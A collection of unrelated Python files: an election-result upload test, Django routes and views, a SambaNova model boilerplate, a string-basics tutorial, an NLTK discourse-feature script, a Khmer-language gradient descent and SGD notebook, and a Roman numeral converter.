client.authorization = ('Basic', ('', token))
query_params = '?create_compound=1&pukelsheim=1'
result = client.post(
'/create-wabsti-proporz' + query_params,
params=params,
headers=[('Accept-Language', 'de_CH')]
)
print(result.json)
assert result.json['status'] == 'success'
session = election_day_app_sg.session()
compound = session.query(ElectionCompound).first()
assert compound.title == 'Wahl der Mitglieder des Kantonsrates'
assert compound.shortcode == 'Kantonsratswahl_2016'
assert compound.associations.count() == 8
assert compound.pukelsheim is True
elections = session.query(Election).filter_by(date=date(2016, 2, 28))
elections = elections.order_by(Election.shortcode)
assert compound.elections == elections.all()
for e in compound.elections:
print(f'{e.title} - {e.shortcode}')
test_election = elections.first()
assert test_election.shortcode == 'Kantonsratswahl (RH)'
assert test_election.title == 'Wahl der Mitglieder des Kantonsrates ' \
'(Wahlkreis Rheintal)'
# Test Re-Upload
result = client.post(
'/create-wabsti-proporz',
params=params,
headers=[('Accept-Language', 'de_CH')]
)
error = 'Die Datenquelle hat bereits Verbindungen zu Wahlen, ' \
'die erstellt wurden.'
assert result.json['errors']['data_source'][0] == error
# Test wrong token
wrong_token = str(uuid4())
client = Client(election_day_app_sg)
client.authorization = ('Basic', ('', wrong_token))
result = client.post(
'/create-wabsti-proporz',
params=params,
headers=[('Accept-Language', 'de_CH')],
status=403
)
def test_create_wabstic_proporz_election_errors(election_day_app_sg):
test_file = module_path(
'tests.onegov.election_day', 'fixtures/wabstic_243/WP_Wahl_errors.csv')
id_, token = add_data_source(
Client(election_day_app_sg),
name='Verbundene Wahlen KR',
upload_type='proporz',
fill=False
)
params = [
('wp_wahl', Upload(test_file, content_type='text/plain'))
]
client = Client(election_day_app_sg)
client.authorization = ('Basic', ('', token))
result = client.post(
'/create-wabsti-proporz',
params=params,
headers=[('Accept-Language', 'de_CH')]
)
assert result.json['status'] == 'error'
errors = result.json['errors']
assert errors == [
dict(
message="time data '28.02.AA' does not match format '%d.%m.%Y'",
filename='wp_wahl',
line=2
),
dict(
message='Leerer Wert: mandate',
filename='wp_wahl',
line=3
)
]
|
from django.urls import path
from . import views
app_name = 'tag'
urlpatterns = [
path('tag_list/', views.TagListView.as_view(),
name='tag-list'),
path('tag_create/', views.TagCreateView.as_view(),
name='tag-create'),
path('tag_delete/<tag_id>', views.TagDeleteView.as_view(),
name='tag-delete'),
path('games_by_tag/<tag_id>', views.GamesByTagView.as_view(),
name='games-by-tag')
]
|
"""SambaNova boilerplate main method."""
#import argparse
import sys
#from typing import Tuple
#import torch
#import torch.nn as nn
#import torchvision
from sambaflow import samba
import sambaflow.samba.utils as utils
from sambaflow.samba.utils.argparser import parse_app_args
from sambaflow.samba.utils.pef_utils import get_pefmeta
#from sambaflow.samba.utils.dataset.mnist import dataset_transform
from sambaflow.samba.utils.common import common_app_driver
from sn_boilerplate_args import *
from sn_boilerplate_model import *
from sn_boilerplate_other import *
def consumeVariables(X, Y):
"""Consume variables because SambaNova uses magic."""
pass
def main(argv):
"""Run main code."""
utils.set_seed(256)
args = parse_app_args(argv=argv, common_parser_fn=add_args, run_parser_fn=add_run_args)
X, Y = FFNLogReg.get_fake_inputs(args)
model = FFNLogReg(args.num_features, args.ffn_dim_1, args.ffn_dim_2, args.num_classes)
# Note: Keep these two lines together and in the same order. The second line magically uses X and Y behind the scenes.
consumeVariables(X, Y)
samba.from_torch_(model)
inputs = (X, Y)
# Instantiate an optimizer.
# Note: --inference can be used with both compile and run commands.
if args.inference:
optimizer = None
else:
optimizer = samba.optim.SGD(model.parameters(),
lr=args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
name = 'ffn_mnist_torch'
if args.command == "compile":
# Run model analysis and compile, this step will produce a PEF.
samba.session.compile(model,
inputs,
optimizer,
name=name,
app_dir=utils.get_file_dir(__file__),
config_dict=vars(args),
pef_metadata=get_pefmeta(args, model))
elif args.command == "test":
samba.utils.trace_graph(model, inputs, optimizer, pef=args.pef, mapping=args.mapping)
outputs = model.output_tensors
test(args, model, inputs, outputs)
elif args.command == "run":
samba.utils.trace_graph(model, inputs, optimizer, pef=args.pef, mapping=args.mapping)
train(args, model, optimizer)
elif args.command == "measure-performance":
# Contact SambaNova if output gradients are needed to calculate loss on the host.
common_app_driver( args=args,
model=model,
inputs=inputs,
name=name,
optim=optimizer,
squeeze_bs_dim=False,
get_output_grads=False,
app_dir=utils.get_file_dir(__file__))
if __name__ == '__main__':
main(sys.argv[1:])
|
# Strings are one f the most common data types in any programming lanugage
# A string literal is just defining a string as such
name = "Adam"
# String interpolation putting variables into a string
greeeting = "Hello " + name + " it is great to meet you!"
# f is format interpolate values into your string using {}
greeeting = f"Hello {name} it is awesome to see you! {7<8}"
# format method of strings
greeeting = "Hello {} is is great to see you! Also something else {}".format(name, "Wassup")
print(greeeting)
# string slicing is being able to take substrings out of a larget string
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# start at 0 go the the 4th character. That is exclusive
abc = alphabet[0:3]
jk = alphabet[9:11]
# negative index
# print(alphabet[len(alphabet)-1])
# -1 is the last element -2 second to last etc
# print(alphabet[-1])
# the last argument is the step
everyother = alphabet[0::-2]
# print(everyother)
# reverse a string in python
zyx = alphabet[::-1]
print(zyx)
l = list(alphabet) # generates a brand new list
del l[2]
print("".join(l))# brand new string
# you can make anything a string by using the str function
x = 100
y = str(x)
print(type(y))
# strings are immutable
# cannot be altered once created
phrase = "hello everyone"
# phrase[8] = "A" # throws an error becuase strings CANNOT be altered once created
|
from nltk import bigrams,trigrams
import string
import nltk
from collections import Counter
mainPath = "./auto-grader/ArgumentDetection/"
input = 'data/pdtb/input/'
def listModals(postags, type, dict_x):
counts = Counter(word if 'MD' in tag else None for word,tag in postags )
for word in counts:
if word is not None:
old = dict_x.get(word+'|||'+type)
if old is None:
old = 0
dict_x[type + '|||' +word] = old +counts[word]
def wps(s_arg_tokens,t_arg_tokens):
fv =[]
for s_arg_token in s_arg_tokens:
for t_arg_token in t_arg_tokens:
wp = s_arg_token + '_' + t_arg_token
fv.append(wp)
return fv
def fthree(arg_tokens,type):
fv = []
tokens = []
for i in range(min(3,len(arg_tokens))):
tokens.append(arg_tokens[i])
fv.append( type +'|||' + '_'.join(tokens) )
return fv
def firstlast(arg_token,type):
fv = []
fv.append( type +'|||' + arg_token)
return fv
def counts(list_x,dict_x):
for word in list_x:
old = dict_x.get(word)
if old is None:
old = 0
dict_x[word] = old +1
return dict_x
def write_to_file(file_name,dict_x):
for word in dict_x:
file_name.write(str(word)+"\t"+str(dict_x[word])+"\n")
file_type = "alldata"
rel_type = 'contingency'
#wordpairs = open(mainPath + input + 'stab.all.arguments.claim.premise.para.1231.'+ file_type + '.wp.txt', "w")
#firstthreeFile = open(mainPath + input + 'stab.all.arguments.claim.premise.para.1231.'+ file_type + '.firstthree.txt', "w")
#modalFile = open(mainPath + input + 'stab.all.arguments.claim.premise.para.1231.'+ file_type + '.modal.txt',"w")
#firstlastFile = open(mainPath + input + 'stab.all.arguments.claim.premise.para.1231.'+ file_type + '.firstlast.txt', "w")
#input_tree = open(mainPath + input + 'stab.all.arguments.claim.premise.para.1231.txt.alldata',"r")
#wordpairs = open(mainPath + input + 'ets.all.arguments.claim.premise.para.1231.'+ file_type + '.wp.txt', "w")
#firstthreeFile = open(mainPath + input + 'ets.all.arguments.claim.premise.para.1231.'+ file_type + '.firstthree.txt', "w")
#firstlastFile = open(mainPath + input + 'ets.all.arguments.claim.premise.para.1231.'+ file_type + '.firstlast.txt', "w")
#modalFile = open(mainPath + input + 'ets.all.arguments.claim.premise.para.1231.'+ file_type + 'modal.txt',"w")
#input_tree = open(mainPath + input + 'ets.all.arguments.claim.premise.para.1231.txt.' + file_type,"r")
#wordpairs = open(mainPath + input + 'sr_train_all_nowindow_11182014.txt.classification.posn.new.'+ file_type + '.wp.txt', "w")
#firstthreeFile = open(mainPath + input + 'sr_train_all_nowindow_11182014.txt.classification.posn.new.'+ file_type + '.firstthree.txt', "w")
#firstlastFile = open(mainPath + input + 'sr_train_all_nowindow_11182014.txt.classification.posn.new.'+ file_type + '.firstlast.txt', "w")
#modalFile = open(mainPath + input + 'sr_train_all_nowindow_11182014.txt.classification.posn.new.'+ file_type + 'modal.txt',"w")
#input_tree = open(mainPath + input + 'sr_train_all_nowindow_11182014.txt.classification.posn.new.' + file_type,"r")
wordpairs = open(mainPath + input + 'pdtb2_ascii_all_0801.txt.'+ rel_type + '.wp.txt', "w")
firstthreeFile = open(mainPath + input + 'pdtb2_ascii_all_0801.txt.'+ rel_type + '.firstthree.txt', "w")
firstlastFile = open(mainPath + input + 'pdtb2_ascii_all_0801.txt.'+ rel_type + '.firstlast.txt', "w")
modalFile = open(mainPath + input + 'pdtb2_ascii_all_0801.txt.'+ rel_type + 'modal.txt',"w")
input_tree = open(mainPath + input + 'pdtb2_ascii_all_0801.txt.' + file_type,"r")
input_tree.readline()
clauses = []
for line in input_tree:
temp = line.lower().split("\t")
if temp[2] != 'explicit':
if temp[4].startswith(rel_type):
comps = temp[5],temp[6]
clauses.append(comps)
wp = {}
modals = {}
firstthree = {}
fl = {}
i = 0
for clause in clauses:
# print clause
# clause = clause.translate(string.maketrans("",""), string.punctuation)
s_arg = clause[0]
t_arg = clause[1]
#we have weird use of commas and periods etc.
#lets take care of some manually
s_arg = s_arg.replace(',',' ')
t_arg = t_arg.replace(',',' ')
s_arg_tokens = nltk.word_tokenize(s_arg)
t_arg_tokens = nltk.word_tokenize(t_arg)
counts(wps(s_arg_tokens,t_arg_tokens),wp)
counts(fthree(s_arg_tokens,'SOURCE'),firstthree)
counts(fthree(t_arg_tokens,'TARGET'),firstthree)
counts(firstlast(s_arg_tokens[0],'SOURCE'),fl)
counts(firstlast(t_arg_tokens[0],'TARGET'),fl)
counts(firstlast(s_arg_tokens[-1],'SOURCE'),fl)
counts(firstlast(t_arg_tokens[-1],'TARGET'),fl)
s_posTags = nltk.pos_tag(s_arg_tokens)
t_posTags = nltk.pos_tag(t_arg_tokens)
listModals(s_posTags,'SOURCE',modals)
listModals(t_posTags,'TARGET',modals)
i=i+1
if i % 100 == 0 and i > 0:
print 'finished ' + str(i) + ' lines'
write_to_file(wordpairs,wp)
write_to_file(firstthreeFile,firstthree)
write_to_file(modalFile,modals)
write_to_file(firstlastFile,fl)
wordpairs.close()
modalFile.close()
firstthreeFile.close()
firstlastFile.close()
|
#!/usr/bin/env python
# coding: utf-8
# # វិធីសាស្រ្តបរមាកម្មតាមរយៈ SGD
# ក្នុងមេរៀនមុនយើងបានសិក្សាអំពីម៉ូឌែលតម្រែតម្រង់លីនេអ៊ែរ ដែលត្រូវបានប្រើប្រាស់សម្រាប់សិក្សាពីការទំនាក់ទំនងរវាងអថេរពន្យល់និងអថេរគោលដៅ។ ក្នុងការកំណត់តម្លៃប៉ារ៉ាម៉ែត្រនៃម៉ូឌែល(មេគុណតម្រែតម្រង់) យើងបានដោះស្រាយតាមរយៈវិធីសាស្រ្តជាមូលដ្ឋាននៃគណិតវិទ្យាវិភាគ។
#
# ប៉ុន្តែក្នុងជីវភាពរស់នៅ ករណីភាគច្រើនចំនួននៃអថេរពន្យល់មានចំនួនច្រើនលើសលប់ ដែលធ្វើឱ្យវិមាត្រនៃម៉ាទ្រីសផែនការមានការកើនឡើងខ្ពស់។ ហេតុនេះ វាមានការលំបាកក្នុងការគណនាម៉ាទ្រីសច្រាស់ដូចក្នុងរបៀបខាងលើទោះបីប្រើប្រាស់ម៉ាស៊ីនកុំព្យូទ័រក្តី។
#
# ក្នុងអត្ថបទនេះ យើងនឹងណែនាំវិធីសាស្រ្តកំណត់តម្លៃប៉ាន់ស្មាននៃមេគុណតម្រែតម្រង់ដោយវិធីគណនាដដែលៗលើតម្លៃលេខតាមប្រមាណវិធីងាយៗគឺ Stochastic Gradient Descent (SGD) ។ ដើម្បីងាយស្រួលស្វែងយល់អំពីSGD ជាដំបូងយើងនឹងណែនាំអំពីគំនិត និងការគណនាក្នុងវិធីសាស្រ្ត Gradient Descent ជាមុន។
#
# ## Gradient Descent
#
# ដូចដែលបានបង្ហាញក្នុងអត្ថបទមុន យើងចង់កំណត់យកមេគុណតម្រែតម្រង់ណាដែលធ្វើឱ្យតម្លៃផលបូកការេនៃកម្រិតលម្អៀងតូចបំផុត។ គោលគំនិតក្នុងGradient Descent គឺផ្លាស់ប្តូរតម្លៃនៃមេគុណតម្រែតម្រង់(ប៉ារ៉ាម៉ែត្រ) បន្តិចម្តងៗ ទៅតាមទិសដៅដែលធ្វើឱ្យតម្លៃផលបូកការេនៃកម្រិតលម្អៀងមានការថយចុះ។ អ្នកអាចប្រដូចវិធីនេះទៅនឹងការចុះជំរាលឬចុះពីទីភ្នំ ដោយរំកិលខ្លួនអ្នកបន្តិចម្តងៗ ទៅកាន់ទីដែលទាបជាងកន្លែងដែលអ្នកនៅ។ នៅពេលដែលអ្នករំកិលខ្លួនដល់ទីដែលលែងមានបម្រែបម្រួលនៃរយៈកម្ពស់ អ្នកអាចសន្និដ្ឋានបានថាអ្នកដល់ទីដែលទាបបំផុតហើយ។ ដូចគ្នានេះដែរ នៅក្នុងវិធីសាស្រ្តGradient Descent តាមលក្ខណៈគណិតវិទ្យានៃ gradient (តម្លៃដេរីវេនៃអនុគមន៍ត្រង់ចំនុចណាមួយ) តម្លៃgradientត្រង់ចំណុចណាមួយគឺជាតម្លៃមេគុណប្រាប់ទិសនៃខ្សែកោងត្រង់ចំណុចនោះហើយក៏ជាតម្លៃធំបំផុតនៃបម្រែបម្រួលតម្លៃអនុគមន៍ពេលអ្នកធ្វើបម្រែបម្រួលលើអថេរមិនអាស្រ័យ។
#
# 
#
# រូបខាងលើនេះបង្ហាញអំពីគំនិតក្នុងវិធីសាស្រ្តធ្វើអប្បបរមាកម្មតាម Gradient Descent។ ដូចដែលអ្នកអាចធ្វើការកត់សម្គាល់បាន ពេលខ្លះអ្នកអាចនឹងធ្លាក់ចុះទៅក្នុងទីតាំងដែលជាបរមាធៀបតែមិនមែនជាកន្លែងអប្បបរមាពិតប្រាកដប្រសិនបើទីតាំងនៃការចាប់ផ្តើមរបស់អ្នកមិនប្រសើរ។ ប៉ុន្តែក្នុងករណីធ្វើបរមាកម្មតម្លៃផលបូកការេនៃកម្រិតលម្អៀងរបស់យើង ដោយសារអនុគមន៍ដែលត្រូវធ្វើបរមាកម្មគឺជាអនុគមន៍ដឺក្រេទី២ ហេតុនេះយើងមិនមានការព្រួយបារម្ភក្នុងករណីនេះឡើយ។
# ពេលនេះ យើងពិនិត្យលើការគណនាក្នុងវិធីសាស្រ្ត Gradient Descent។
#
# យើងសិក្សាលើអនុគមន៍ដែលយកតម្លៃស្កាលែ $f\left(\pmb{x}\right)$ ដែល $\pmb{x}\in\mathbb{R}^d$។ សន្មតថាអនុគមន៍នេះយកតម្លៃអប្បបរមាត្រង់ចំណុច $\pmb{x}^\ast$ ។ វិធីសាស្រ្ត Gradient Descent អាចឱ្យយើងគណនាតម្លៃ(ប្រហែល)នៃ $\pmb{x}^\ast$ បានដោយចាប់ផ្តើមពីតម្លៃ$\ \pmb{x}^{\left(0\right)}\ $ណាមួយ រួចធ្វើការផ្លាស់ប្តូរតម្លៃនេះតាមការគណនាដូចខាងក្រោម។
#
# $$\pmb{x}^{\left(t+1\right)}=\pmb{x}^{\left(t\right)}-\eta_t\left.\frac{\partial f\left(\pmb{x}\right)}{\partial\pmb{x}}\right|_{\pmb{x}=\pmb{x}^{\left(\pmb{t}\right)}}$$
#
# នៅទីនេះ$t=0,1,\ldots$ គឺជាលេខរៀងនៃការផ្លាស់ប្តូរតម្លៃអថេរ$\pmb{x}$។ $\frac{\partial f\left(\pmb{x}\right)}{\partial\pmb{x}} $ គឺជាដេរីវេដោយផ្នែកនៃអនុគមន៍$\ f $ធៀបនឹងអថេរ$ \pmb{x} $ឬហៅថា gradient ។$ \eta_t $គឺជាកម្រិតនៃការផ្លាស់ប្តូរតម្លៃអថេរដោយគ្រប់គ្រងលើឥទ្ធិពលនៃតម្លៃgradient។ នៅក្នុង Machine Learning វាត្រូវបានហៅថាជា អត្រារៀនឬ learning rate ។ ជាទូទៅតម្លៃនៃ$\eta_t$ ត្រូវបានកំណត់យកចន្លោះ០និង១ដោយតម្លៃយ៉ាងតូច។ យើងអាចកំណត់លក្ខខណ្ឌសម្រាប់បញ្ចប់ការផ្លាស់ប្តូរតម្លៃនៃអថេរបាន ដោយយកពេលដែលតម្លៃដាច់ខាតនៃ gradient យកតម្លៃសូន្យឬក្បែរសូន្យ។
#
# ពិនិត្យលើករណីគម្រូងាយមួយ $f\left(x\right)=x^2-2x-3 $។ ករណីនេះយើងដឹងច្បាស់ថាតម្លៃអប្បបរមានៃអនុគមន៍គឺ $-4$ នៅពេលដែល $x^\ast=1$។ យើងនឹងផ្ទៀងផ្ទាត់ជាមួយតម្លៃដែលគណនាតាមរយៈGradient Descent។
#
# ដំបូងយើងគណនាអនុគមន៍ដេរីវេ $ \frac{df\left(x\right)}{dx}=2x-2 $និង កំណត់យកអត្រា$\ \eta=0.1 $ថេរ។ យើងចាប់ផ្តើមពីចំណុច$ x^{\left(0\right)}=0\ \ ,\ f\left(x^{\left(0\right)}\right)=-3 $។ ដោយផ្លាស់ប្តូរតម្លៃអថេរតាមរយៈGradient Descent ខាងលើយើងបានបម្រែបម្រួលនៃតម្លៃអថេរនិងតម្លៃអនុគមន៍ដូចតារាងខាងក្រោម។
#
# | $\pmb{t}$ | $x^{(t)}$ | $ \frac{df\left(x\right)}{dx}$ | $f(x) $ |
# |:-: |- |- |- |
# | 0 | 0.00 | -2.00 | -3.00 |
# | 1 | 0.20 | -1.60 | -3.36 |
# | 2 | 0.36 | -1.28 | -3.59 |
# | $\vdots$ | $\vdots$ | $\vdots$ | $\vdots$ |
# | 44 | 0.999946 | -0.000109 | -4.00 |
# | 45 | 0.999956 | -0.000087 | -4.00 |
# In[1]:
import numpy as np
import matplotlib.pyplot as plt
# In[2]:
def f(x):
return x ** 2 - 2 * x -3
def g(x):
return 2*x - 2
def sd(f, g, x=0., eta=0.01, eps=1e-4):
t = 1
H = []
while True:
gx = g(x)
H.append(dict(t=t, x=x, fx=f(x), gx=gx))
if -eps < gx < eps:
break
x -= eta * gx
t += 1
return H
# In[3]:
H = sd(f, g, x = 0, eta=0.1)
H[-1]
# In[4]:
fig = plt.figure(dpi=150)
ax = fig.add_subplot(1,1,1)
ax.plot(
[h['t'] for h in H],
[h['fx'] for h in H],
'x-'
)
ax.set_xlabel('$t$')
ax.set_ylabel('$f(x)$')
ax.grid()
# យើងត្រលប់ទៅកាន់ម៉ូឌែលតម្រែតម្រង់របស់យើងវិញ។ អនុគមន៍ដែលយើងចង់ធ្វើអប្បបរមាកម្មគឺ $E\left(\pmb{\beta}\right)$ ដោយយក$\ \pmb{\beta} $ជាអថេរ។
#
# $$
# E\left(\pmb{\beta}\right)=\sum_{i=1}^{N}\epsilon_i^2=\left(\pmb{y}-X\pmb{\beta}\right)^\top\left(\pmb{y}-X\pmb{\beta}\right)
# $$
#
# អនុគមន៍ដេរីវេ(gradient)របស់វាគឺ
#
# $$
# E\left(\pmb{\beta}\right)=\left(\pmb{y}-X\pmb{\beta}\right)^\top\left(\pmb{y}-X\pmb{\beta}\right)=\pmb{y}^\top\pmb{y}-2\pmb{y}^\top X\pmb{\beta}+\pmb{\beta}^\top X^\top X\pmb{\beta}
# $$
#
# $$
# \frac{\partial}{\partial\pmb{\beta}}E\left(\pmb{\beta}\right)=-2X^\top\pmb{y}-2X^\top X\pmb{\beta}=2X^\top\left(X\pmb{\beta}-\pmb{y}\right)=2X^\top\left(\hat{\pmb{y}}-\pmb{y}\right)
# $$
#
# ហេតុនេះ កន្សោមសម្រាប់ការផ្លាស់ប្តូរតម្លៃអថេរគឺ
#
# $$
# \pmb{\beta}^{\left(t+1\right)}=\pmb{\beta}^{\left(t\right)}-\eta_t\left.\frac{\partial E\left(\pmb{\beta}\right)}{\partial\pmb{\beta}}\right|_{\pmb{\beta}=\pmb{\beta}^{\left(\pmb{t}\right)}}
# $$
#
# $$\pmb{\beta}^{\left(t+1\right)}=\pmb{\beta}^{\left(t\right)}-2\eta_tX^\top\left({\hat{\pmb{y}}}^{\left(t\right)}-\pmb{y}\right)\ \ $$
#
# ដែល$\hat{\pmb{y}}^{\left(t\right)}=X\pmb{\beta}^{\left(t\right)}$។
#
# យើងសាកល្បងគណនាតម្លៃប្រហែលនៃមេគុណតម្រែតម្រង់ដែលបានសិក្សាក្នុងអត្ថបទមុនដោយប្រើ gradient descent។ លើកនេះយើងយកតម្លៃកម្ពស់គិតជាម៉ែត្រដើម្បីបង្រួមតម្លៃលេខ។
#
# | <br>កម្ពស់(m) | <br>1.52 | <br>1.57 | <br>1.60 | <br>1.63 | <br>1.50 | <br>1.47 | <br>1.65 | <br>1.68 | <br>1.78 |
# |- |- |- |- |- |- |- |- |- |- |
# | <br>ម៉ាស(kg) | <br>54.48 | <br>55.84 | <br>57.20 | <br>58.57 | <br>53.12 | <br>52.21 | <br>59.93 | <br>61.29 | <br>69.92 |
# In[5]:
X = np.array([1.52,1.57,1.60,1.63,1.50,1.47,1.65,1.68,1.70])
y = np.array([54.48,55.84,57.20,56.57,53.12,52.21,59.93,61.29,67.92])
XP = np.vstack([np.ones_like(X), X]).T
beta = np.zeros(XP.shape[1])
eta = 1e-3
for t in range(100000):
y_hat = XP @ beta
beta -= 2 * eta * XP.T @ (y_hat - y)
# In[6]:
def predict(x,w,k):
X_ = np.zeros((len(x),k+1))
for i in range(k+1):
X_[:,i] = x**i
return X_@w
xa = np.linspace(1.45,1.72,50)
plt.scatter(X,y,marker='x')
plt.plot(xa,predict(xa,beta,1),'r-')
plt.xlabel('height(cm)')
plt.ylabel('mass(kg)')
y_legend = "y="+str(round(beta[0],3))+"+"+str(round(beta[1],3))+"x"
plt.legend([y_legend,"observed-data"])
plt.title("Learning with Gradient Descent")
plt.show()
# ## Stochastic Gradient Descent
# ការធ្វើបរមាកម្មលើតម្លៃអនុគមន៍ដោយប្រើ Gradient Descent អាចជួយយើងឱ្យធ្វើការគណនា
# បានយ៉ាងមានប្រសិទ្ធភាពទោះបីជាវិមាត្រឬចំនួននៃអថេរពន្យល់ច្រើនក៏ដោយ។ ប៉ុន្តែក្នុងវិធីសាស្រ្ត Gradient Descent ការគណនា gradient ត្រូវបានធ្វើឡើងដោយប្រើប្រាស់ទិន្នន័យទាំងអស់ដែលមានក្នុងដៃ។ ក្នុងករណីដែលចំនួនទិន្នន័យមានច្រើន វិធីនេះត្រូវបានគេដឹងថាមានភាពយឺតយ៉ាវក្នុងការរួមទៅរកតម្លៃបរមារបស់អនុគមន៍។
#
# ដើម្បីដោះស្រាយបញ្ហានេះ Stochastic Gradient Descent (SGD) ត្រូវបានប្រើប្រាស់ជំនួសវិញ។ ក្នុងករណីចំនួនទិន្នន័យដែលមាន(N) មានបរិមាណច្រើន ក្នុងវិធីSGD ទិន្នន័យម្តងមួយៗ ត្រូវបានជ្រើសយកដោយចៃដន្យដើម្បីគណនា gradient នៃអនុគមន៍ រួចធ្វើការផ្លាស់ប្តូរតម្លៃអថេរតែម្តង ដោយមិនចាំបាច់ធ្វើការបូកសរុបគ្រប់ទិន្នន័យដែលមាននោះឡើយ។
#
# ជាទូទៅ ដើម្បីអនុវត្តSGDបាន ចំពោះទិន្នន័យសរុបDដែលមានអនុគមន៍ដែលត្រូវធ្វើបរមាកម្ម ត្រូវតែអាចសរសេរជាផលបូកនៃអនុគមន៍ដែលយកករណីទិន្នន័យនិមួយៗជាធាតុចូលដូចខាងក្រោម។
#
# $$
# E_D\left(\pmb{\beta}\right)=\sum_{\left(\pmb{x},y\right)\in D} e\left(\pmb{\beta}\right)
# $$
#
# ក្នុងករណីយើងកំពុងសិក្សានេះ ដោយសារ$E_D\left(\pmb{\beta}\right)$ត្រូវបានកំណត់ដោយផលបូកការេនៃកម្រិតលម្អៀងគ្រប់ទិន្នន័យទាំងអស់ $E_D\left(\pmb{\beta}\right)=\sum_{i=1}^{N}\epsilon_i^2$ ហេតុនេះ លក្ខខណ្ឌខាងលើត្រូវបានផ្ទៀងផ្ទាត់។
#
# ចំពោះទិន្នន័យនិមួយៗ$\left(\pmb{x}_i,y_i\right)$ gradient នៃអនុគមន៍ដែលត្រូវធ្វើបរមាកម្មអាចគណនាបានដូចខាងក្រោម។
#
# $$
# \frac{\partial e\left(\pmb{\beta}\right)}{\partial\pmb{\beta}}=\frac{\partial}{\partial\pmb{\beta}}\left(y_i-\pmb{x}_i^\top\pmb{\beta}\right)^2=-2\left(y_i-\pmb{x}_i^\top\pmb{\beta}\right)\pmb{x}_i^\top=2\left({\hat{y}}_i-y_i\right)\pmb{x}_i^\top
# $$
#
# កន្សោមសម្រាប់ធ្វើការផ្លាស់ប្តូរតម្លៃនៃអថេរតាម SGD គឺអាចបង្ហាញដូចទម្រង់ខាងក្រោម។
#
# $$
# \pmb{\beta}^{\left(t+1\right)}=\pmb{\beta}^{\left(t\right)}-\eta_t\left.\frac{\partial e\left(\pmb{\beta}\right)}{\partial\pmb{\beta}}\right|_{\pmb{\beta}=\pmb{\beta}^{\left(\pmb{t}\right)}}
# $$
#
# $$
# \pmb{\beta}^{\left(t+1\right)}=\pmb{\beta}^{\left(t\right)}-2\eta_t\left({{\hat{y}}_i}^{\left(t\right)}-y\right)\pmb{x}_i^\top
# \pmb{\beta}^{\left(t+1\right)}=\pmb{\beta}^{\left(t\right)}-2\eta_t\pmb{\delta}_\pmb{i}
# $$
#
# ដែល $\pmb{\delta}_\pmb{i}=\left({{\hat{y}}_i}^{\left(t\right)}-y\right)\pmb{x}_i^\top$។
#
# ជាមួយPythonអ្នកអាចសរសេរCodeដូចខាងក្រោម។
# នៅទីនេះយើងកំណត់យកតម្លៃចាប់ផ្តើមនៃ $\pmb{\beta}^{\left(0\right)}=\mathbf{0}\ $ និង $\eta=0.001$
# In[7]:
import random
beta = np.zeros(2)
d_index = list(range(len(X)))
eta = 1e-3
for t in range(100000):
random.shuffle(d_index)
for i in d_index :
XP = np.vstack([np.ones_like(X[i]), X[i]]).T
y_hat = XP @ beta
beta -= 2 * eta * XP.T @ (y_hat - y[i])
# In[17]:
xa = np.linspace(1.45,1.72,50)
plt.scatter(X,y,marker='x')
plt.plot(xa,predict(xa,beta,1),'r-')
plt.xlabel('height(cm)')
plt.ylabel('mass(kg)')
y_legend = "y="+str(round(beta[0],3))+"+"+str(round(beta[1],3))+"x"
plt.legend([y_legend,"observed-data"])
plt.title("Learning with Gradient Descent")
plt.show()
# បើយើងធ្វើការប្រៀបធៀបរវាង Gradient Descent និង SGD យើងអាចនិយាយបានថា SGD គឺជាវិធីសាស្រ្តដែលសន្មតយកតម្លៃ gradient ចំពោះគ្រប់ទិន្នន័យទាំងអស់ក្នុង Gradient Descent ដោយតម្លៃប្រហែល
# $\pmb{\delta}_\pmb{i}=\left({{\hat{y}}_i}^{\left(t\right)}-y\right)\pmb{x}_i^\top\ $ ពោលគឺ $ \frac{\partial E_D\left(\pmb{\beta}\right)}{\partial\pmb{\beta}}\approx\frac{\partial e_{\pmb{x}_i,y_i}\left(\pmb{\beta}\right)}{\partial\pmb{\beta}}=\pmb{\delta}_\pmb{i}$។
# In[ ]:
|
def solution(n):
solution =[]
while (n // 1000 >= 1):
solution.append("M")
n = n - 1000
while (n // 500 >= 1):
if (n >= 900):
solution.append("CM")
n = n - 900
break
solution.append("D")
n = n - 500
while (n // 100 >= 1):
if (n >= 400):
solution.append("CD")
n = n - 400
break
solution.append("C")
n = n - 100
while (n // 50 >= 1):
if (n >= 90):
solution.append("XC")
n = n - 90
break
solution.append("L")
n = n - 50
while (n // 10 >= 1):
if (n >= 40):
solution.append("XL")
n = n - 40
break
solution.append("X")
n = n - 10
while (n // 5 >= 1):
if (n == 9):
solution.append("IX")
n = n - 9
break
solution.append("V")
n = n - 5
while (n // 1 >= 1):
if (n == 4):
solution.append("IV")
break
solution.append("I")
n = n - 1
return "".join(solution)
print(solution(92))
"""
"M":1000,"CM":900,"D":500,"CD":400,"C":100,"XC":90,"L":50,"XL":40,"X":10,"V":5,"IV":4,"I":1
Symbol Value
I 1
V 5
X 10
L 50
C 100
D 500
M 1,000
""" |
from django.shortcuts import render,render_to_response
from django.template import RequestContext
from django.http import HttpResponseRedirect
from jobs.forms import QuoteForm
from jobs.models import UserProfile
#import sendgrid
import sys
# Create your views here.
def home(request):
return render_to_response("jobs/home.html", RequestContext(request))
def contact(request):
return render_to_response("static/contact.html", RequestContext(request))
def faq(request):
return render_to_response("static/faq.html", RequestContext(request))
def terms(request):
return render_to_response("static/terms.html", RequestContext(request))
def privacy(request):
return render_to_response("static/privacy.html", RequestContext(request))
def team(request):
return render_to_response("static/team.html", RequestContext(request))
def about(request):
return render_to_response("static/about.html", RequestContext(request))
def success(request):
return render_to_response("static/success.html", RequestContext(request))
def quoteForm(request):
if request.method == 'POST':
userprofile = UserProfile.objects.get(user=request.user)
post_values = request.POST.copy()
post_values['user'] = userprofile.user.id
form = QuoteForm(post_values)
print >> sys.stderr, form.is_valid()
if form.is_valid():
# sg = sendgrid.SendGridClient('insert_user_here', 'insert_pass_here')
# message = sendgrid.Mail()
# message.add_to('HF <mail@hirefellas.com>')
# message.set_subject('Quote Request')
# userid = userprofile.user.username
# message.set_text("You've a new quote request from " + userid)
# message.set_from('Pranav Prabhakar <mail@hirefellas.com>')
# status, msg = sg.send(message)
form.save()
return HttpResponseRedirect('/success/')
else:
print >> sys.stderr, form.errors
else:
form = QuoteForm()
location = request.GET.get('location', '')
#event_type = request.GET.get('event_type', '')
photography_type = request.GET.get('photography_type', '')
form.fields["location"].initial = location
#form.fields["event_type"].initial = event_type
form.fields["photography_type"].initial = photography_type
print >> sys.stderr, photography_type
